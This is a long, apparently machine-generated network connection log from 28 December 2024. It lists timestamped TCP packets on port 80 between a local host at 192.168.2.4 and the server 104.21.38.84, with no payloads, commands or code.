                                                                        Dec 28, 2024 20:43:53.408422947 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:53.491044998 CET8049885104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:53.528531075 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:53.528541088 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:53.719923973 CET4988580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:53.839560032 CET8049885104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:53.839663029 CET8049885104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:53.839731932 CET8049885104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:53.942519903 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:53.943427086 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:54.063026905 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:54.275716066 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:54.275964022 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:54.395633936 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:54.395935059 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:54.892842054 CET8049885104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:54.893074036 CET8049885104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:54.893218994 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:54.893239021 CET4988580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:54.895816088 CET8049885104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:54.895878077 CET4988580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:54.904783964 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:55.024455070 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:55.030970097 CET4988580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:55.032854080 CET4988780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:55.151180983 CET8049885104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:55.152662992 CET8049887104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:55.152720928 CET4988580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:55.152748108 CET4988780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:55.152890921 CET4988780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:55.237490892 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:55.238914967 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:55.272341967 CET8049887104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:55.361275911 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:55.361325026 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:55.501260042 CET4988780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:55.621100903 CET8049887104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:55.621114969 CET8049887104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:55.621124983 CET8049887104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:55.776707888 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:55.777532101 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:55.897550106 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:56.110094070 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:56.110275984 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:56.236579895 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:56.236596107 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:56.282757044 CET8049887104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:56.329174995 CET4988780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:56.523976088 CET8049887104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:56.579180002 CET4988780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:56.601788998 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:56.604264021 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:56.649317026 CET4988780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:56.650353909 CET4989280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:56.724215984 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:56.769211054 CET8049887104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:56.769274950 CET4988780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:56.769864082 CET8049892104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:56.769948006 CET4989280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:56.770175934 CET4989280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:56.889662027 CET8049892104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:56.936953068 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:56.937150002 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:57.056674004 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:57.056777000 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:57.126178026 CET4989280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:57.247705936 CET8049892104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:57.247740984 CET8049892104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:57.247786999 CET8049892104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:57.465439081 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:57.466928959 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:57.593172073 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:57.806282997 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:57.806577921 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:57.926155090 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:57.926354885 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:57.948057890 CET8049892104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:58.094810009 CET4989280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:58.201148033 CET8049892104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:58.329303980 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:58.333621025 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:58.352139950 CET4989280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:58.352979898 CET4989880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:58.459412098 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:58.478892088 CET8049892104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:58.478975058 CET4989280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:58.479319096 CET8049898104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:58.479387045 CET4989880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:58.479480982 CET4989880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:58.601845026 CET8049898104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:58.672089100 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:58.672282934 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:58.792587996 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:58.792623997 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:58.829238892 CET4989880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:58.950942993 CET8049898104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:58.950957060 CET8049898104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:58.950964928 CET8049898104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:59.201597929 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:59.206228971 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:59.326034069 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:59.538660049 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:59.538830042 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:59.613854885 CET8049898104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:59.658360958 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:59.658467054 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:59.704210997 CET4989880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:59.856158018 CET8049898104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:43:59.907322884 CET4989880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:59.983308077 CET4989880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:43:59.984014988 CET4990480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:00.073123932 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:00.073951960 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:00.104677916 CET8049898104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:00.104731083 CET4989880192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:00.104912043 CET8049904104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:00.104978085 CET4990480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:00.105099916 CET4990480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:00.197197914 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:00.228478909 CET8049904104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:00.409724951 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:00.409931898 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:00.454277039 CET4990480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:00.529905081 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:00.529920101 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:00.573914051 CET8049904104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:00.574023008 CET8049904104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:00.574050903 CET8049904104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:00.942364931 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:00.943289995 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:01.062808990 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:01.275568962 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:01.278292894 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:01.287153006 CET8049904104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:01.398580074 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:01.398709059 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:01.407339096 CET4990480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:01.540999889 CET8049904104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:01.594819069 CET4990480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:01.807503939 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:01.809144974 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:01.898741961 CET4990480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:01.899471045 CET4990680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:01.930134058 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:02.022979021 CET8049904104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:02.023040056 CET4990480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:02.023381948 CET8049906104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:02.023433924 CET4990680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:02.023562908 CET4990680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:02.142896891 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:02.143187046 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:02.149739981 CET8049906104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:02.266881943 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:02.267043114 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:02.376167059 CET4990680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:02.495784044 CET8049906104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:02.495794058 CET8049906104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:02.495804071 CET8049906104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:02.679475069 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:02.680489063 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:02.801989079 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:03.014292955 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:03.014561892 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:03.117609024 CET8049906104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:03.134313107 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:03.134367943 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:03.172924042 CET4990680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:03.356231928 CET8049906104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:03.407398939 CET4990680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:03.500010967 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:03.520323038 CET4990680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:03.521209002 CET4991180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:03.594810009 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:03.647110939 CET8049906104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:03.647177935 CET4990680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:03.647397995 CET8049911104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:03.647461891 CET4991180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:03.647574902 CET4991180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:03.710264921 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:03.710823059 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:03.771158934 CET8049911104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:03.830411911 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:04.001158953 CET4991180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:04.042982101 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:04.044490099 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:04.120944977 CET8049911104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:04.120989084 CET8049911104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:04.121033907 CET8049911104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:04.164127111 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:04.164211988 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:04.590536118 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:04.592837095 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:04.713335037 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:04.736143112 CET8049911104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:04.782315016 CET4991180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:04.925966978 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:04.928540945 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:04.979186058 CET8049911104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:05.032304049 CET4991180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:05.112338066 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:05.112345934 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:05.305152893 CET4991180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:05.305895090 CET4991780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:05.425729990 CET8049911104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:05.425792933 CET8049917104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:05.425797939 CET4991180192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:05.425966978 CET4991780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:05.425996065 CET4991780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:05.461091995 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:05.462404013 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:05.545908928 CET8049917104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:05.582895041 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:05.782461882 CET4991780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:05.795557022 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:05.795722008 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:05.904731035 CET8049917104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:05.904740095 CET8049917104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:05.904756069 CET8049917104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:05.917284966 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:05.917294025 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:06.632049084 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:06.632666111 CET8049917104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:06.632925034 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:06.666804075 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:06.668435097 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:06.704226017 CET4991780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:06.754815102 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:06.758754015 CET8049917104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:06.835927963 CET4991780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:06.871613026 CET4991780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:06.872179985 CET4992280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:06.966998100 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:06.968343973 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:06.993752003 CET8049917104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:06.993843079 CET4991780192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:06.994126081 CET8049922104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:06.994194984 CET4992280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:06.994298935 CET4992280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:07.093568087 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:07.093681097 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:07.120064974 CET8049922104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:07.344861031 CET4992280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:07.464509010 CET8049922104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:07.464539051 CET8049922104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:07.464581966 CET8049922104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:07.499813080 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:07.500504017 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:07.620201111 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:07.832963943 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:07.834839106 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:07.954904079 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:07.954916954 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:08.084136009 CET8049922104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:08.127057076 CET4992280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:08.327881098 CET8049922104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:08.376184940 CET4992280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:08.381503105 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:08.383023024 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:08.456137896 CET4992280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:08.456587076 CET4992580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:08.502552032 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:08.576061010 CET8049925104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:08.576319933 CET8049922104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:08.576596022 CET4992580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:08.576598883 CET4992280192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:08.576657057 CET4992580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:08.696822882 CET8049925104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:08.716012001 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:08.718245983 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:08.838035107 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:08.838044882 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:08.923166037 CET4992580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:09.048151016 CET8049925104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:09.048162937 CET8049925104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:09.048223972 CET8049925104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:09.243686914 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:09.246526957 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:09.366148949 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:09.579026937 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:09.579315901 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:09.701589108 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:09.701602936 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:09.707803011 CET8049925104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:09.907476902 CET4992580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:10.006495953 CET8049925104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:10.094942093 CET4992580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:10.114824057 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:10.120981932 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:10.123236895 CET4992580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:10.123845100 CET4993080192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:10.240622997 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:10.243004084 CET8049925104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:10.243185043 CET4992580192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:10.243235111 CET8049930104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:10.243302107 CET4993080192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:10.243397951 CET4993080192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:10.362812996 CET8049930104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:10.453563929 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:10.456464052 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:10.576013088 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:10.576057911 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:10.594959021 CET4993080192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:10.714905977 CET8049930104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:10.714924097 CET8049930104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:10.714968920 CET8049930104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:10.990828991 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:10.994580984 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:11.115833998 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:11.328167915 CET8049930104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:11.328716040 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:11.328937054 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:11.376190901 CET4993080192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:11.448820114 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:11.449031115 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:11.569171906 CET8049930104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:11.610454082 CET4993080192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:11.684961081 CET4993080192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:11.685651064 CET4993680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:11.805011034 CET8049930104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:11.805211067 CET4993080192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:11.805377007 CET8049936104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:11.805432081 CET4993680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:11.805520058 CET4993680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:12.157326937 CET4993680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:12.157403946 CET4993680192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:12.314881086 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:12.315291882 CET8049930104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:12.315301895 CET8049734104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:12.315339088 CET4993080192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:12.315357924 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:12.315669060 CET4973480192.168.2.4104.21.38.84
                                                                        Dec 28, 2024 20:44:12.317445040 CET8049936104.21.38.84192.168.2.4
                                                                        Dec 28, 2024 20:44:12.318037033 CET8049936104.21.38.84192.168.2.4
